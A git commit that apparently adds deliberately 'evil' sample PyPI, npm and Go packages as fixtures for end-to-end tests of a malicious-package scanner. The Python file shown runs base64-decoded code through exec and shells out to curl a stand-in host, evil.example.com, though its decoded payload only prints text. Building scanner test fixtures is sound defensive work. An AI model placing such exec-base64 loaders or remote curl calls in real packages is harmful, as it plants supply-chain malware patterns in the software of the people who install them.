feat: примеры вредоносных пакетов + E2E-тест + документация

- examples/evil-pypi/: exec-base64, shady-links, code-execution, dll-hijacking - examples/evil-npm/: eval, Buffer(base64), shady-links - examples/evil-go/: exec+base64, shady-links - examples/trigger-scans.sh: сборка архивов + Docker cp + вебхуки + проверка - README.md + README.en.md: секция E2E-тестирования с curl-примерами - E2E пройден: pypi(2 findings), npm(1), go(1) — все flagged
2026-05-10 13:13:36 +03:00
parent c1258dde99
commit 11ce9802e9
8 changed files with 209 additions and 0 deletions
--- a/examples/evil-pypi/setup.py
+++ b/examples/evil-pypi/setup.py
@@ -0,0 +1,8 @@
+from setuptools import find_packages, setup
+
+setup(
+    name="evil-pypi",
+    version="0.1.0",
+    packages=find_packages(where="src"),
+    package_dir={"": "src"},
+)
--- a/examples/evil-pypi/src/evil_package.py
+++ b/examples/evil-pypi/src/evil_package.py
@@ -0,0 +1,22 @@
+import base64
+import os
+
+# GuardDog will flag: exec-base64, code-execution, shady-links
+
+VERSION = "0.1.0"
+
+# exec-base64: base64-encoded code execution
+encoded = "cHJpbnQoImhlbGxvIik="
+exec(base64.b64decode(encoded))
+
+# code-execution: dynamic code execution
+code = compile("print('dynamic')", "<string>", "exec")
+exec(code)
+
+# shady-links: suspicious URLs
+url = "http://evil.example.com/payload"
+os.system(f"curl -s {url}")
+
+# dll-hijacking: ctypes-based library loading
+import ctypes
+ctypes.CDLL("/usr/lib/libc.so.6")